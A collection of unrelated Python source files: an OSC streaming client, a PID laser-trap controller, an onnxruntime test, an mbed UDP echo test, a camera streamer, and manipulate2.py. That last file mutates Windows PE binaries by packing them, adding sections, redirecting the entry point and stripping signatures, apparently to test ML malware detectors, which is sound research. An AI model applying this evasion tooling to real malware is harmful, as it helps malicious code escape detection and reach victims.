self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return None
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return None
else:
raise e
if not tmp or len(tmp) == 0:
print "CLIENT: Socket has been closed."
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get the OSC packet size from the stream; it is prepended to each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print "CLIENT: Entered receiving thread."
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print "CLIENT: Receiving thread terminated."
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return False
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = (cmp(self.socket._sock, other.socket._sock) == 0)
if isequal and getattr(self, 'server', None) and getattr(other, 'server', None):
return cmp(self.server, other.server) == 0
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
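# Editor's usage sketch: connect to a streaming OSC server at a hypothetical
# address, send one message, then close; replies arrive on the receiving
# thread and are dispatched against the client's own address space.
def _example_streamingClient():
    client = OSCStreamingClient()
    client.connect(("127.0.0.1", 9000))
    client.sendOSC(OSCMessage("/ping"))
    client.close()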
# vim:noexpandtab
|
TrapFeedback.py
|
from simple_pid import PID
import time
import threading
import urllib
import json
import ast
import math
class TrapFeedback(object):
def __init__(self, waveManager):
self.waveManager = waveManager
self.PIDs = []
self.P = .0005
self.I = .000002
self.D = .000001
self.setpoint = 1000
self.waitTime = .1
def updateAmplitudes(self, measuredIntensities, channel):
newAmplitudes = []
print ("updating")
for i in range(len(self.PIDs)):
newPower = self.PIDs[i](measuredIntensities[i]) # PID output is a power in dB
newAmplitudes += [10.0**(newPower/10.0)] # convert dB back to a linear amplitude
print (str(newPower) + " " + str(measuredIntensities[i]))
self.waveManager.changeAmplitudes(channel, newAmplitudes)
self.waveManager.saveJsonData()
def initializePIDs(self, channel):
self.PIDs = []
currentAmplitudes = self.waveManager.getAmplitudes(channel)
print (len(currentAmplitudes))
for i in range(len(currentAmplitudes)):
self.PIDs += [PID(self.P, self.I, self.D, setpoint=self.setpoint, output_limits=(-20, 0))]
self.PIDs[i].auto_mode = False
self.PIDs[i].set_auto_mode(True, last_output=10*math.log10(currentAmplitudes[i]))
def measureIntensities(self, channel):
dataNames = ['yAmplitudes', 'xAmplitudes']
url = "http://128.104.162.32/peakData" #10.0.0.128
response = urllib.urlopen(url)
data = ast.literal_eval(response.read())
return data[dataNames[channel]]
def iteratePID(self, channel):
t = threading.currentThread()
self.running = True
while getattr(t, "run", True):
self.updateAmplitudes(self.measureIntensities(channel), channel)
time.sleep(self.waitTime)
if not self.running:
break
def startFeedback(self, channel):
self.feedback = threading.Thread(target=self.iteratePID, args=[channel])
self.feedback.start()
def stopFeedback(self):
self.running = False
self.feedback.join()
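# Editor's usage sketch ('waveManager' is an assumed external object exposing
# getAmplitudes/changeAmplitudes/saveJsonData, as used by the class above):
def _example_trapFeedback(waveManager):
    fb = TrapFeedback(waveManager)
    fb.initializePIDs(0)  # one PID per trap amplitude on channel 0
    fb.startFeedback(0)   # feedback loop runs in a background thread
    time.sleep(1.0)
    fb.stopFeedback()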
|
ort_eps_test.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import unittest
import torch
import onnxruntime_pybind11_state as torch_ort
import os
import sys
def is_windows():
return sys.platform.startswith("win")
from io import StringIO
import sys
import threading
import time
class OutputGrabber(object):
"""
Class used to grab standard output or another stream.
"""
escape_char = "\b"
def __init__(self, stream=None, threaded=False):
self.origstream = stream
self.threaded = threaded
if self.origstream is None:
self.origstream = sys.stdout
self.origstreamfd = self.origstream.fileno()
self.capturedtext = ""
# Create a pipe so the stream can be captured:
self.pipe_out, self.pipe_in = os.pipe()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Start capturing the stream data.
"""
self.capturedtext = ""
# Save a copy of the stream:
self.streamfd = os.dup(self.origstreamfd)
# Replace the original stream with our write pipe:
os.dup2(self.pipe_in, self.origstreamfd)
if self.threaded:
# Start thread that will read the stream:
self.workerThread = threading.Thread(target=self.readOutput)
self.workerThread.start()
# Make sure that the thread is running and os.read() has executed:
time.sleep(0.01)
def stop(self):
"""
Stop capturing the stream data and save the text in `capturedtext`.
"""
# Print the escape character to make the readOutput method stop:
self.origstream.write(self.escape_char)
# Flush the stream to make sure all our data goes in before
# the escape character:
self.origstream.flush()
if self.threaded:
# wait until the thread finishes so we are sure that
# we have read everything up to the last character:
self.workerThread.join()
else:
self.readOutput()
# Close the pipe:
os.close(self.pipe_in)
os.close(self.pipe_out)
# Restore the original stream:
os.dup2(self.streamfd, self.origstreamfd)
# Close the duplicate stream:
os.close(self.streamfd)
def readOutput(self):
"""
Read the stream data (one byte at a time)
and save the text in `capturedtext`.
"""
while True:
char = os.read(self.pipe_out, 1).decode(self.origstream.encoding)
if not char or self.escape_char in char:
break
self.capturedtext += char
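# Editor's usage sketch: because OutputGrabber swaps the underlying file
# descriptor, it captures C-level writes to stdout as well as Python prints.
def _example_outputGrabber():
    with OutputGrabber() as out:
        print("hello from the grabber")
    assert "hello from the grabber" in out.capturedtext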
class OrtEPTests(unittest.TestCase):
def get_test_execution_provider_path(self):
if is_windows():
return os.path.join(".", "test_execution_provider.dll")
else:
return os.path.join(".", "libtest_execution_provider.so")
def test_import_custom_eps(self):
torch_ort.set_device(0, "CPUExecutionProvider", {})
torch_ort._register_provider_lib("TestExecutionProvider", self.get_test_execution_provider_path(), {})
# capture std out
with OutputGrabber() as out:
torch_ort.set_device(1, "TestExecutionProvider", {"device_id": "0", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 0, some_option: val" in out.capturedtext
with OutputGrabber() as out:
torch_ort.set_device(2, "TestExecutionProvider", {"device_id": "1", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 1, some_option: val" in out.capturedtext
# test the reusing EP instance
with OutputGrabber() as out:
torch_ort.set_device(3, "TestExecutionProvider", {"device_id": "0", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 0, some_option: val" not in out.capturedtext
# test clear training ep instance pool
torch_ort.clear_training_ep_instances()
with OutputGrabber() as out:
torch_ort.set_device(3, "TestExecutionProvider", {"device_id": "0", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 0, some_option: val" in out.capturedtext
def test_print(self):
x = torch.ones(1, 2)
ort_x = x.to("ort")
with OutputGrabber() as out:
print(ort_x)
assert "tensor([[1., 1.]], device='ort:0')" in out.capturedtext
if __name__ == "__main__":
unittest.main()
|
udp_echo_client.py
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import socket
from sys import stdout
from threading import Thread
from SocketServer import BaseRequestHandler, UDPServer
from mbed_host_tests import BaseHostTest, event_callback
class UDPEchoClientHandler(BaseRequestHandler):
def handle(self):
""" UDP packet handler. Echoes data back to sender's address.
"""
data, sock = self.request
print ('HOST: UDPEchoClientHandler: Rx: \n%s\n' % data)
sock.sendto(data, self.client_address)
class UDPEchoClientTest(BaseHostTest):
def __init__(self):
"""
Initialise test parameters.
:return:
"""
BaseHostTest.__init__(self)
self.SERVER_IP = None # Will be determined after knowing the target IP
        self.SERVER_PORT = 0   # Let UDPServer choose an arbitrary port
self.server = None
self.server_thread = None
self.target_ip = None
@staticmethod
def find_interface_to_target_addr(target_ip):
"""
Finds IP address of the interface through which it is connected to the target.
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, 0)) # Target IP, Any port
ip = s.getsockname()[0]
s.close()
return ip
def setup_udp_server(self):
"""
sets up a UDP server for target to connect and send test data.
:return:
"""
        # !NOTE: there should be a mechanism to assert in the host test
        if self.SERVER_IP is None:
            self.log("setup_udp_server() called before determining server IP!")
            self.notify_complete(False)
            # Returning early suppresses the host test from printing a success code
            return
        # allow_reuse_address must be set before the server socket is bound
        UDPServer.allow_reuse_address = True
        self.server = UDPServer((self.SERVER_IP, self.SERVER_PORT), UDPEchoClientHandler)
        ip, port = self.server.server_address
        self.SERVER_PORT = port
self.log("HOST: Listening for UDP packets: " + self.SERVER_IP + ":" + str(self.SERVER_PORT))
self.server_thread = Thread(target=UDPEchoClientTest.server_thread_func, args=(self,))
self.server_thread.start()
@staticmethod
def server_thread_func(this):
"""
        Thread function to run the UDP server forever.
:param this:
:return:
"""
this.server.serve_forever()
@event_callback("target_ip")
def _callback_target_ip(self, key, value, timestamp):
"""
Callback to handle reception of target's IP address.
:param key:
:param value:
:param timestamp:
:return:
"""
self.target_ip = value
self.SERVER_IP = self.find_interface_to_target_addr(self.target_ip)
self.setup_udp_server()
@event_callback("host_ip")
def _callback_host_ip(self, key, value, timestamp):
"""
Callback for request for host IP Addr
"""
self.send_kv("host_ip", self.SERVER_IP)
@event_callback("host_port")
def _callback_host_port(self, key, value, timestamp):
"""
Callback for request for host port
"""
self.send_kv("host_port", self.SERVER_PORT)
def teardown(self):
if self.server:
self.server.shutdown()
self.server_thread.join()
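# --- Hedged sketch: a minimal peer exercising UDPEchoClientHandler ---
# Not part of the host test itself; the address below is a placeholder for
# the values the target receives via the "host_ip"/"host_port" events.
#
# import socket
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.sendto(b"hello", ("192.168.0.10", 50000))
# data, _ = s.recvfrom(1024)
# assert data == b"hello"  # the handler echoes every datagram back verbatim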
|
manipulate2.py
|
# TODO:
# * modify exports using lief
# * zero out rich header (if it exists) --> requires updating OptionalHeader's checksum ("Rich Header" only in Microsoft-produced executables)
# * tinker with resources: https://lief.quarkslab.com/doc/tutorials/07_pe_resource.html
import lief # pip install https://github.com/lief-project/LIEF/releases/download/0.7.0/linux_lief-0.7.0_py3.6.tar.gz
import json
import os
import sys
import array
import struct # byte manipulations
import random
import tempfile
import subprocess
import functools
import signal
import multiprocessing
module_path = os.path.split(os.path.abspath(sys.modules[__name__].__file__))[0]
COMMON_SECTION_NAMES = open(os.path.join(
module_path, 'section_names.txt'), 'r').read().rstrip().split('\n')
COMMON_IMPORTS = json.load(
open(os.path.join(module_path, 'small_dll_imports.json'), 'r'))
class MalwareManipulator(object):
def __init__(self, bytez):
self.bytez = bytez
self.min_append_log2 = 5
self.max_append_log2 = 8
def __random_length(self):
return 2**random.randint(self.min_append_log2, self.max_append_log2)
def __binary_to_bytez(self, binary, dos_stub=False, imports=False, overlay=False, relocations=False, resources=False, tls=False):
# write the file back as bytez
builder = lief.PE.Builder(binary)
if(dos_stub):
builder.build_dos_stub(dos_stub) # rebuild DOS stub
if(imports):
builder.build_imports(imports) # rebuild IAT in another section
builder.patch_imports(imports) # patch original import table with trampolines to new import table
if(overlay):
builder.build_overlay(overlay) # rebuild overlay
if(relocations):
builder.build_relocations(relocations) # rebuild relocation table in another section
if(resources):
builder.build_resources(resources) # rebuild resources in another section
if(tls):
builder.build_tls(tls) # rebuilt TLS object in another section
builder.build() # perform the build process
        # the builder's write() output seems to differ from get_build(), so write to a temp file and read it back
import time
tmpfile = str(hash(time.time()))
builder.write(tmpfile)
with open(tmpfile, "rb") as binfile:
binary = binfile.read()
os.remove(tmpfile)
return binary
# section_* would have no change since none of the flags are true with the following return
# return array.array('B', builder.get_build()).tobytes()
def overlay_append(self, seed=None):
random.seed(seed)
L = self.__random_length()
# choose the upper bound for a uniform distribution in [0,upper]
upper = random.randrange(256)
# upper chooses the upper bound on uniform distribution:
# upper=0 would append with all 0s
# upper=126 would append with "printable ascii"
# upper=255 would append with any character
return self.bytez + bytes([random.randint(0, upper) for _ in range(L)])
def imports_append(self, seed=None):
# add (unused) imports
random.seed(seed)
binary = lief.PE.parse(self.bytez, name='')
# draw a library at random
libname = random.choice(list(COMMON_IMPORTS.keys()))
funcname = random.choice(list(COMMON_IMPORTS[libname]))
lowerlibname = libname.lower()
# find this lib in the imports, if it exists
lib = None
for im in binary.imports:
if im.name.lower() == lowerlibname:
lib = im
break
if lib is None:
# add a new library
lib = binary.add_library(libname)
# get current names
names = set([e.name for e in lib.entries])
        if funcname not in names:
lib.add_entry(funcname)
self.bytez = self.__binary_to_bytez(binary,imports=True)
return self.bytez
# def exports_append(self,seed=None):
# TODO: when LIEF has a way to create this
# random.seed(seed)
# binary = lief.PE.parse( self.bytez )
# if not binary.has_exports:
# return self.bytez
# # TO DO: add a lief.PE.DATA_DIRECTORY.EXPORT_TABLE to the data directory
# # find the data directory
# for i,e in enumerate(binary.data_directories):
# if e.type == lief.PE.DATA_DIRECTORY.EXPORT_TABLE:
# break
# def exports_reorder(self,seed=None):
# # reorder exports
# pass
def section_rename(self, seed=None):
# rename a random section
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
targeted_section = random.choice(binary.sections)
targeted_section.name = random.choice(COMMON_SECTION_NAMES)[:7] # current version of lief not allowing 8 chars?
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def section_add(self, seed=None):
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
new_section = lief.PE.Section(
"".join(chr(random.randrange(ord('.'), ord('z'))) for _ in range(6)))
# fill with random content
upper = random.randrange(256)
L = self.__random_length()
new_section.content = [random.randint(0, upper) for _ in range(L)]
new_section.virtual_address = max(
[s.virtual_address + s.size for s in binary.sections])
# add a new empty section
binary.add_section(new_section,
random.choice([
lief.PE.SECTION_TYPES.BSS,
lief.PE.SECTION_TYPES.DATA,
lief.PE.SECTION_TYPES.EXPORT,
lief.PE.SECTION_TYPES.IDATA,
lief.PE.SECTION_TYPES.RELOCATION,
lief.PE.SECTION_TYPES.RESOURCE,
lief.PE.SECTION_TYPES.TEXT,
lief.PE.SECTION_TYPES.TLS_,
lief.PE.SECTION_TYPES.UNKNOWN,
]))
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def section_append(self, seed=None):
# append to a section (changes size and entropy)
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
targeted_section = random.choice(binary.sections)
L = self.__random_length()
available_size = targeted_section.size - len(targeted_section.content)
if L > available_size:
L = available_size
upper = random.randrange(256)
targeted_section.content = targeted_section.content + \
[random.randint(0, upper) for _ in range(L)]
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
# def section_reorder(self,param,seed=None):
# # reorder directory of sections
# pass
def create_new_entry(self, seed=None):
# create a new section with jump to old entry point, and change entry point
# DRAFT: this may have a few technical issues with it (not accounting for relocations), but is a proof of concept for functionality
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
# get entry point
entry_point = binary.optional_header.addressof_entrypoint
# get name of section
entryname = binary.section_from_rva(entry_point).name
# create a new section
new_section = lief.PE.Section(entryname + "".join(chr(random.randrange(
ord('.'), ord('z'))) for _ in range(3))) # e.g., ".text" + 3 random characters
# push [old_entry_point]; ret
new_section.content = [
0x68] + list(struct.pack("<I", entry_point + 0x10000)) + [0xc3]
new_section.virtual_address = max(
[s.virtual_address + s.size for s in binary.sections])
# TO DO: account for base relocation (this is just a proof of concepts)
# add new section
binary.add_section(new_section, lief.PE.SECTION_TYPES.TEXT)
# redirect entry point
binary.optional_header.addressof_entrypoint = new_section.virtual_address
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def upx_pack(self, seed=None):
# tested with UPX 3.91
random.seed(seed)
tmpfilename = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
# dump bytez to a temporary file
with open(tmpfilename, 'wb') as outfile:
outfile.write(self.bytez)
options = ['--force', '--overlay=copy']
compression_level = random.randint(1, 9)
options += ['-{}'.format(compression_level)]
# --exact
# compression levels -1 to -9
# --overlay=copy [default]
# optional things:
# --compress-exports=0/1
# --compress-icons=0/1/2/3
# --compress-resources=0/1
# --strip-relocs=0/1
options += ['--compress-exports={}'.format(random.randint(0, 1))]
options += ['--compress-icons={}'.format(random.randint(0, 3))]
options += ['--compress-resources={}'.format(random.randint(0, 1))]
options += ['--strip-relocs={}'.format(random.randint(0, 1))]
with open(os.devnull, 'w') as DEVNULL:
retcode = subprocess.call(
['upx'] + options + [tmpfilename, '-o', tmpfilename + '_packed'], stdout=DEVNULL, stderr=DEVNULL)
os.unlink(tmpfilename)
if retcode == 0: # successfully packed
with open(tmpfilename + '_packed', 'rb') as infile:
self.bytez = infile.read()
os.unlink(tmpfilename + '_packed')
return self.bytez
def upx_unpack(self, seed=None):
# dump bytez to a temporary file
tmpfilename = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
with open(tmpfilename, 'wb') as outfile:
outfile.write(self.bytez)
with open(os.devnull, 'w') as DEVNULL:
retcode = subprocess.call(
['upx', tmpfilename, '-d', '-o', tmpfilename + '_unpacked'], stdout=DEVNULL, stderr=DEVNULL)
os.unlink(tmpfilename)
        if retcode == 0:  # successfully unpacked
with open(tmpfilename + '_unpacked', 'rb') as result:
self.bytez = result.read()
os.unlink(tmpfilename + '_unpacked')
return self.bytez
def remove_signature(self, seed=None):
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
if binary.has_signature:
for i, e in enumerate(binary.data_directories):
if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
break
if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
# remove signature from certificate table
e.rva = 0
e.size = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
# if no signature found, self.bytez is unmodified
return self.bytez
def remove_debug(self, seed=None):
random.seed(seed)
binary = lief.PE.parse(self.bytez, name="")
if binary.has_debug:
for i, e in enumerate(binary.data_directories):
if e.type == lief.PE.DATA_DIRECTORY.DEBUG:
break
if e.type == lief.PE.DATA_DIRECTORY.DEBUG:
                # zero out the debug directory entry
e.rva = 0
e.size = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
        # if no debug directory is found, self.bytez is unmodified
return self.bytez
def break_optional_header_checksum(self, seed=None):
binary = lief.PE.parse(self.bytez, name="")
binary.optional_header.checksum = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
##############################
def identity(bytez, seed=None):
return bytez
######################
# explicitly list so that these may be used externally
ACTION_TABLE = {
# 'do_nothing': identity,
'overlay_append': 'overlay_append',
'imports_append': 'imports_append',
'section_rename': 'section_rename',
'section_add': 'section_add',
'section_append': 'section_append',
'create_new_entry': 'create_new_entry',
'remove_signature': 'remove_signature',
'remove_debug': 'remove_debug',
'upx_pack': 'upx_pack',
'upx_unpack': 'upx_unpack',
'break_optional_header_checksum': 'break_optional_header_checksum',
# 'modify_exports' : modify_exports,
}
def modify_without_breaking(bytez, actions=[], seed=None):
for action in actions:
_action = ACTION_TABLE[action]
# we run manipulation in a child process to shelter
# our malware model from rare parsing errors in LIEF that
# may segfault or timeout
def helper(_action,shared_list):
            # TODO: LIEF is chatty. redirect stdout and stderr to /dev/null
            # for this process, and turn a segfault of the child process
            # into a RuntimeError
def sig_handler(signum, frame):
raise RuntimeError
signal.signal(signal.SIGSEGV, sig_handler)
bytez = array.array('B', shared_list[:]).tobytes()
# TODO: LIEF is chatty. redirect output to /dev/null
if type(_action) is str:
_action = MalwareManipulator(bytez).__getattribute__(_action)
else:
_action = functools.partial( _action, bytez )
# redirect standard out only in this queue
try:
shared_list[:] = _action(seed)
except (RuntimeError,UnicodeDecodeError,TypeError,lief.not_found) as e:
# some exceptions that have yet to be handled by public release of LIEF
print("==== exception in child process ===")
print(e)
# shared_bytez remains unchanged
# communicate with the subprocess through a shared list
# can't use multiprocessing.Array since the subprocess may need to
# change the size
manager = multiprocessing.Manager()
shared_list = manager.list()
shared_list[:] = bytez # copy bytez to shared array
# define process
p = multiprocessing.Process( target=helper, args=(_action,shared_list) )
p.start() # start the process
        # Process.join() never raises on timeout; it simply returns, so check
        # whether the child is still alive to detect a hang...
        p.join(5)  # allow this to take up to 5 seconds...
        if p.is_alive():  # ...then become petulant
            print('==== timeout: terminating child process ====')
            p.terminate()
            p.join()
bytez = array.array('B', shared_list[:]).tobytes() # copy result from child process
import hashlib
m = hashlib.sha256()
m.update( bytez )
print("new hash: {}".format(m.hexdigest()))
return bytez
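# --- Hedged usage sketch (illustrative only) ---
# "sample.exe" is a placeholder path; modify_without_breaking() looks up each
# named action in ACTION_TABLE and applies it inside a sheltered child process.
#
# with open("sample.exe", "rb") as f:
#     bytez = f.read()
# bytez = modify_without_breaking(bytez, actions=["overlay_append", "section_rename"])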
def test(bytez):
binary = lief.PE.parse(bytez)
#print('overlay_append')
#manip = MalwareManipulator(bytez)
#bytez2 = manip.overlay_append(bytez)
#binary2 = lief.PE.parse(bytez2)
#assert len(binary.overlay) != len(binary2.overlay), "modification failed"
# SUCCEEDS, but note that lief builder also adds a new ".l1" section for each patch of the imports
print('imports_append')
manip = MalwareManipulator(bytez)
bytez2 = manip.imports_append(bytez)
binary2 = lief.PE.parse(bytez2, name='')
set1 = set(binary.imported_functions)
set2 = set(binary2.imported_functions)
diff = set2.difference(set1)
print(list(diff))
assert len(binary.imported_functions) != len(binary2.imported_functions), "no new imported functions"
# SUCCEEDS
print('section_rename')
manip = MalwareManipulator(bytez)
bytez2 = manip.section_rename(bytez)
binary2 = lief.PE.parse(bytez2, name='')
oldsections = [s.name for s in binary.sections]
newsections = [s.name for s in binary2.sections]
print(oldsections)
print(newsections)
assert " ".join(newsections) != " ".join(oldsections), "no modified sections"
print('section_add')
manip = MalwareManipulator(bytez)
bytez2 = manip.section_add(bytez)
binary2 = lief.PE.parse(bytez2, name='')
oldsections = [s.name for s in binary.sections]
newsections = [s.name for s in binary2.sections]
print(oldsections)
print(newsections)
assert len(newsections) != len(oldsections), "no new sections"
# FAILS if there's insufficient room to add to the section
print('section_append')
manip = MalwareManipulator(bytez)
bytez2 = manip.section_append(bytez)
binary2 = lief.PE.parse(bytez2, name='')
oldsections = [len(s.content) for s in binary.sections]
newsections = [len(s.content) for s in binary2.sections]
print(oldsections)
print(newsections)
assert sum(newsections) != sum(oldsections), "no appended section"
print('create_new_entry') # note: also adds a new section
manip = MalwareManipulator(bytez)
bytez2 = manip.create_new_entry(bytez)
binary2 = lief.PE.parse(bytez2, name='')
print(binary.entrypoint)
print(binary2.entrypoint)
assert binary.entrypoint != binary2.entrypoint, "no new entry point"
print('remove_signature')
manip = MalwareManipulator(bytez)
bytez2 = manip.remove_signature(bytez)
binary2 = lief.PE.parse(bytez2, name='')
if binary.has_signature:
assert binary2.has_signature == False, "failed to remove signature"
print('remove_debug')
manip = MalwareManipulator(bytez)
bytez2 = manip.remove_debug(bytez)
binary2 = lief.PE.parse(bytez2, name='')
if binary.has_debug:
assert binary2.has_debug == False, "failed to remove debug"
print('break_optional_header_checksum')
manip = MalwareManipulator(bytez)
bytez2 = manip.break_optional_header_checksum(bytez)
binary2 = lief.PE.parse(bytez2, name='')
assert binary2.optional_header.checksum == 0, "checksum not zero :("
|
aps_video.py
|
# aps_video.py
#
# Copyright (c) 2022 John Fritz
# MIT License, see license.md for full license text
from imutils.video import VideoStream
import threading
import time
import datetime
import os
os.environ["OPENCV_IO_MAX_IMAGE_PIXELS"] = str(2 ** 64)
import cv2
import collections
import numpy as np
from timelapse import Timelapse
from utils import *
class ApsVideo:
def __init__(self):
# source: 2 for pi camera, 0 for usb webcam. Must have fswebcam installed on host machine
self.vs_started = True
self.frame_lock = threading.Lock()
self.frame_queue = Queue(max_size=10)
# Init video stream
self.frame_width_px = 960
self.frame_height_px = 720
self.resolution = (self.frame_width_px, self.frame_height_px)
# USB Camera
self.vs_usb = VideoStream(src=0, resolution=self.resolution).start()
# Sleep to allow camera to warm up
time.sleep(2)
# Pi Camera
self.vs_pi = VideoStream(
src=2, usePiCamera=True, resolution=self.resolution
).start()
# Sleep to allow camera to warm up
time.sleep(2)
# Init timelapse object
self.timelapse = Timelapse()
# Start thread to generate frames
generate_frame_thread = threading.Thread(target=self.generate_frame)
generate_frame_thread.daemon = True
generate_frame_thread.start()
def get_screenshot(self):
frame = None
with self.frame_lock:
# Pull latest image out of frame queue, return it, and put it back in frame queue
frame = self.frame_queue.dequeue()
self.frame_queue.enqueue(frame)
return frame
def _merge_frames(self, frame1, frame2):
frame1 = frame1[:, :, :3]
frame1_x, _ = frame1.shape[:2]
frame2 = frame2[:, :, :3]
x, y = frame2.shape[0:2]
new_frame = cv2.resize(frame2, (int(y * float(frame1_x) / x), frame1_x))
new_frame = np.hstack((new_frame, frame1))
return new_frame
def generate_frame(self):
timelapseDelay = 30 # Seconds
lastUpdatedTime = 0
pi_frame = None
usb_frame = None
frame = None
frame_updated = False
while True:
# Delay to limit framerate
# time.sleep(0.05)
with self.frame_lock:
# Get frame from camera
pi_frame = self.vs_pi.read()
usb_frame = self.vs_usb.read()
if (pi_frame is not None) and (usb_frame is not None):
frame = self._merge_frames(pi_frame, usb_frame)
# Write timestamp on top of frame
timestamp = datetime.datetime.now()
cv2.putText(
frame,
timestamp.strftime("%a %d %b %Y %H:%M:%S"),
(10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
(0, 0, 0),
4,
)
cv2.putText(
frame,
timestamp.strftime("%a %d %b %Y %H:%M:%S"),
(10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
(255, 255, 255),
2,
)
# Insert frame into frame queue
self.frame_queue.enqueue(frame)
frame_updated = True
# print('Enqueued frame, current count is {} frames'.format(len(self.frame_queue._queue)))
if frame_updated:
# Save frame for timelapse
if time.time() > (lastUpdatedTime + timelapseDelay):
self.timelapse.save_frame(frame)
lastUpdatedTime = time.time()
def encode_frame(self):
frame_updated = False
last_encoded_image = None
while True:
time.sleep(0.05)
with self.frame_lock:
try:
frame = self.frame_queue.dequeue()
frame_updated = True
# print('Dequeued frame, current count is {} frames'.format(len(self.frame_queue._queue)))
                except Exception:  # queue empty or not yet populated
frame_updated = False
print("No data in frame_queue")
if frame_updated:
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
# encode the frame in JPEG format
(flag, encoded_image) = cv2.imencode(".jpg", frame, encode_param)
# ensure the frame was successfully encoded
if not flag:
continue
# Copy new encoded image to last encoded image
last_encoded_image = encoded_image
# yield the output frame in the byte format
if last_encoded_image is not None:
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n"
+ bytearray(last_encoded_image)
+ b"\r\n"
)
else:
continue
def stop(self):
# Release video stream pointers
cv2.destroyAllWindows()
self.vs_pi.stop()
self.vs_usb.stop()
